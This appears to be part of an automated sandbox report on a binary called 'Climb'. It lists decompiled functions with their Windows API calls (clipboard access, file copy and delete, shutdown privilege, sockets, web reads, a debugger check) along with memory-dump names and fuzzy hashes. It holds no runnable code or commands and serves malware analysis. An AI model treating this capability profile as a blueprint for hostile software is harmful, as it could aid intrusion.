MoveFileW.KERNEL32(?,?), ref: 0011DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 0011DAE2

Part of subcall function 0011DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0011DAC7,?,?), ref: 0011DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 0011DAFE
FindClose.KERNEL32(00000000), ref: 0011DB0F

Strings

\*.*, xrefs: 0011D978, 0011D981, 0011D996

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 7c3f0dedb828e267529ac57d79dd98395993e64c0517e88a5007f04536a68e35
Instruction ID: 9151bb12045fa37c160f5a99e6af1d758649498514e6177a222dd91eb71b8579
Opcode Fuzzy Hash: 7c3f0dedb828e267529ac57d79dd98395993e64c0517e88a5007f04536a68e35
Instruction Fuzzy Hash: 91615E3190510DAFCF09EBE0E992DEDB7B5AF15304F2040A9E442771A2EB756F89CB61

Function 0012F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0012F7EE
EmptyClipboard.USER32 ref: 0012F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 0012F809
CloseClipboard.USER32 ref: 0012F900

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: ed41398ee8773eb79fa6c6258207007436fbb5cf0d8af697ebb6865202dca2d3
Instruction ID: fb458ff8d2aeae6e41364dbc623ac5513ee58a070912db8c7976df6c6859c6b7
Opcode Fuzzy Hash: ed41398ee8773eb79fa6c6258207007436fbb5cf0d8af697ebb6865202dca2d3
Instruction Fuzzy Hash: 2C418B34A04621AFD710CF15E888B55BBE4EF45318F15C0ADE8198BA72C775ED82CB90

Function 0011F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00112010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
Part of subcall function 00112010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
Part of subcall function 00112010: GetLastError.KERNEL32 ref: 00112097

ExitWindowsEx.USER32(?,00000000), ref: 0011F249

Strings

, xrefs: 0011F237
SeShutdownPrivilege, xrefs: 0011F219
, xrefs: 0011F273
@, xrefs: 0011F23C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ca28189ebe2a79e07a89b509b070b4f7449ea33f39e93f4f695e936431fbc953
Instruction ID: c98419663d463e498787957031a9dc054fefdc03428bdb119f5a7d93fe807f33
Opcode Fuzzy Hash: ca28189ebe2a79e07a89b509b070b4f7449ea33f39e93f4f695e936431fbc953
Instruction Fuzzy Hash: 5601D67A6102106BEF1C66B8AC8AFFA72AC9B19354F254539FD02E31E1D770DDC291A0

Function 00123A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F56C2,?,?,00000000,00000000), ref: 00123A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000F56C2,?,?,00000000,00000000), ref: 00123A35
LoadResource.KERNEL32(?,00000000,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE), ref: 00123A45
SizeofResource.KERNEL32(?,00000000,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE), ref: 00123A56
LockResource.KERNEL32(000F56C2,?,?,000F56C2,?,?,00000000,00000000,?,?,?,?,?,?,000B66CE,?), ref: 00123A65

Strings

SCRIPT, xrefs: 00123A2B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9ae4e0f7d1cf24bcb0da9623e322273235103e82f7bca9c34559bb6b08512f6a
Instruction ID: 919be4c6734f36c8292c29582ee653775ab1e82679db2b30b2e2c7a944a3f0c4
Opcode Fuzzy Hash: 9ae4e0f7d1cf24bcb0da9623e322273235103e82f7bca9c34559bb6b08512f6a
Instruction Fuzzy Hash: 3F117974200701BFEB218B65EC48F277BB9EFC6B40F14426DF416D76A0DBB1E9008A20

Function 001120AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00111900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00111916
Part of subcall function 00111900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00111922
Part of subcall function 00111900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00111931
Part of subcall function 00111900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00111938
Part of subcall function 00111900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0011194E

GetLengthSid.ADVAPI32(?,00000000,00111C81), ref: 001120FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112107
HeapAlloc.KERNEL32(00000000), ref: 0011210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00112127
GetProcessHeap.KERNEL32(00000000,00000000,00111C81), ref: 0011213B
HeapFree.KERNEL32(00000000), ref: 00112142

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0772cc5320520dd5878bf0e44945c34ebb7b3ff769485fb98868ae56db74596d
Instruction ID: 32eddfe55b1200714e07101602de814ed7d4791ed52839ec5c408495a0c3155e
Opcode Fuzzy Hash: 0772cc5320520dd5878bf0e44945c34ebb7b3ff769485fb98868ae56db74596d
Instruction Fuzzy Hash: 2011AC75600204FFDB18DFA4EC09BEE7BA9EF45365F144028F94197220C7359990CB60

Function 0012A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0012A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0012A6D0

Part of subcall function 001242B9: GetInputState.USER32 ref: 00124310
Part of subcall function 001242B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001243AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0012A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0012A6BA

Strings

*.*, xrefs: 0012A5A2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 5c5a949adcb726b67872c3ce077254bd62eb657ba4138ab90e7136e0de6201b6
Instruction ID: e04db2d7226216f3d848a3f71de37bbe9e729440bc0263218b1f792d45f74956
Opcode Fuzzy Hash: 5c5a949adcb726b67872c3ce077254bd62eb657ba4138ab90e7136e0de6201b6
Instruction Fuzzy Hash: 7B41807190021AAFCF15DFA4EC49AEEBBB5FF05310F54405AE805A31A1EB719E94CFA1

Function 000B22AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 000B233E
GetSysColor.USER32(0000000F), ref: 000B2421
SetBkColor.GDI32(?,00000000), ref: 000B2434

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: fc534a1736efeded1338274ddf5fde2fa4de96debe7f6c384a8b0d712bb81ffd
Instruction ID: cc0c5c1bfa491d2ab14b76698f4dc7c099d70cd8f0aef386a102dcace56f1c67
Opcode Fuzzy Hash: fc534a1736efeded1338274ddf5fde2fa4de96debe7f6c384a8b0d712bb81ffd
Instruction Fuzzy Hash: FF815EF0108508BDE679B63C8C98EFF25DEDB42750F150119F202D6EAACA5DDF42A276

Function 00132263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00133AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
Part of subcall function 00133AAB: _wcslen.LIBCMT ref: 00133AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001322BA
WSAGetLastError.WSOCK32 ref: 001322E1
bind.WSOCK32(00000000,?,00000010), ref: 00132338
WSAGetLastError.WSOCK32 ref: 00132343
closesocket.WSOCK32(00000000), ref: 00132372

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 0a216405a2c9628b25181a748a2135a390fee012e8c4e81346fe5f5e882d660e
Instruction ID: d236e8b1ae3cd2c16333ee0223b459a8e8f5a08ba5e88814ab46ceb0807c4557
Opcode Fuzzy Hash: 0a216405a2c9628b25181a748a2135a390fee012e8c4e81346fe5f5e882d660e
Instruction Fuzzy Hash: 0A51B175A00200AFE710AF24C886FAA77A5AF49754F448098F956AB293C774ED41CBA1

Function 001426DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0014275C
IsWindowEnabled.USER32 ref: 0014276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00142777
IsIconic.USER32 ref: 00142785
IsZoomed.USER32 ref: 00142793

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e57c02698c1a8802e5973443fb18af8306c199913394b80420542668873d4a40
Instruction ID: 85063b54aa061f2981f2ab5b2859ba0bc3cfa88c13c9cf12107f44d35b953d16
Opcode Fuzzy Hash: e57c02698c1a8802e5973443fb18af8306c199913394b80420542668873d4a40
Instruction Fuzzy Hash: EB21F7357002108FD7119F26D844B5A7BE5EFA5325F99806CF84A8B372CB71EC82CB90

Function 0012D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0012D8CE
GetLastError.KERNEL32(?,00000000), ref: 0012D92F
SetEvent.KERNEL32(?,?,00000000), ref: 0012D943

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: c81fd135afc0a1eb160c73a346d10bbae2d4a83c6b70edf6627be82b0222198f
Instruction ID: 86f2cfe677d8e3915c33e871ba605619a498fa27e02a5730874fc45c88a70563
Opcode Fuzzy Hash: c81fd135afc0a1eb160c73a346d10bbae2d4a83c6b70edf6627be82b0222198f
Instruction Fuzzy Hash: 0221A1B5500715AFEB209F65F848BAAB7FCEB41318F10441EF646D2252E770EA94CB60

Function 0011E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,000F46AC), ref: 0011E482
GetFileAttributesW.KERNEL32(?), ref: 0011E491
FindFirstFileW.KERNEL32(?,?), ref: 0011E4A2
FindClose.KERNEL32(00000000), ref: 0011E4AE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 44d4e01d1474573dd12ab6407ebbf5daaf75b96d816aa2c2644b9320fc35d698
Instruction ID: 3a4a849937dcce75c6141a4e517a09cef2bd13a4ba51b53f4f2a7c7253ddda41
Opcode Fuzzy Hash: 44d4e01d1474573dd12ab6407ebbf5daaf75b96d816aa2c2644b9320fc35d698
Instruction Fuzzy Hash: D8F0A030410910579A1967B8BC0D8AA76AEAF02336B504711FD76C28F0D7B899D58696

Function 0010E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0010E5F8

Strings

%.3d, xrefs: 0010E603
X64, xrefs: 0010E680

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: cc5f443a8cca1e8ff7318e605e7e0589fc801390b7c28c7e830864aabc46cc43
Instruction ID: e740f15a05c6cfc2083570bdb1ee5b5c3764aaaf2a6f9f0bfdd344adc56e0ebb
Opcode Fuzzy Hash: cc5f443a8cca1e8ff7318e605e7e0589fc801390b7c28c7e830864aabc46cc43
Instruction Fuzzy Hash: DFD012B1C04108D6CB989B91ED48DBD73BDBB28300F558C56F946E1080EBA1D9489B21

Function 000E2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 000E2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 000E2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 000E2AA1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9b7a861816fb7ccc5029c952281eb5dcd73ab0c03c240450a3ab6653a19812f1
Instruction ID: c82b6c9e5822d5d15bf4ef2ccbaf22b4ab326fe890a857c2e096586ddfc1f5f5
Opcode Fuzzy Hash: 9b7a861816fb7ccc5029c952281eb5dcd73ab0c03c240450a3ab6653a19812f1
Instruction Fuzzy Hash: 4831D37490132C9BCB21DF68D9887DCBBB8BF08310F5042EAE80CA6261E7309F858F55

Function 00112010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 000D014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000D09D8
Part of subcall function 000D014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000D09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
GetLastError.KERNEL32 ref: 00112097

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 16f09580eff6f5da16717914f42adfac5b9909b1b7b5ad673a049c6792f77a5d
Instruction ID: b098af1f50dd9ac6b6b78ddd9edab670120fdb44a9b6af3c64c763d6933fdfa2
Opcode Fuzzy Hash: 16f09580eff6f5da16717914f42adfac5b9909b1b7b5ad673a049c6792f77a5d
Instruction Fuzzy Hash: E711BFB1400304AFD7189F54EC86EABB7B8EB09710F20852EF04653251DB70FC81CB20

Function 000D5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5079
TerminateProcess.KERNEL32(00000000,?,000D502E,?,001798D8,0000000C,000D5185,?,00000002,00000000), ref: 000D5080
ExitProcess.KERNEL32 ref: 000D5092

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b9cbc2d8dccee8fee277c9218785410e371f1fd53fa7cde414687c9c4a3902e5
Instruction ID: c36c9290974f2a148b72eb105c392ac9f638641a50e4d34092e972488eda021f
Opcode Fuzzy Hash: b9cbc2d8dccee8fee277c9218785410e371f1fd53fa7cde414687c9c4a3902e5
Instruction Fuzzy Hash: 9CE0B635000648AFCF216F54ED09E983FA9EF51792F514015FC599AA32DB35DD82CAD0

Function 0010E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0010E664

Strings

X64, xrefs: 0010E680

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: eab3a62a48384c33985ed733ae092aae48e5f65d5bdab78ebc95f1647ad2c5f7
Instruction ID: 5fb7f791318030f0556b08833111e7be0cab06196965ea959d119e1432bcc745
Opcode Fuzzy Hash: eab3a62a48384c33985ed733ae092aae48e5f65d5bdab78ebc95f1647ad2c5f7
Instruction Fuzzy Hash: 75D0C9F480111DEACF94CB50EC88EDD73BCBB04304F110A55F146A2040D77096488B10

Function 001241FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001352EE,?,?,00000035,?), ref: 00124229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001352EE,?,?,00000035,?), ref: 00124239

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 507b2860cc7dec344f4511121e224a53beae9ac6397d57a315cdc8ead418b15e
Instruction ID: 3b751feeb7a6be2bf8e2f06b92cfb573cf953f48c00040075835a50ed528e442
Opcode Fuzzy Hash: 507b2860cc7dec344f4511121e224a53beae9ac6397d57a315cdc8ead418b15e
Instruction Fuzzy Hash: 27F0E5747002286BEB201766BC4DFEB3A6DEFC5761F000275F505D2291DAB09A40C6B0

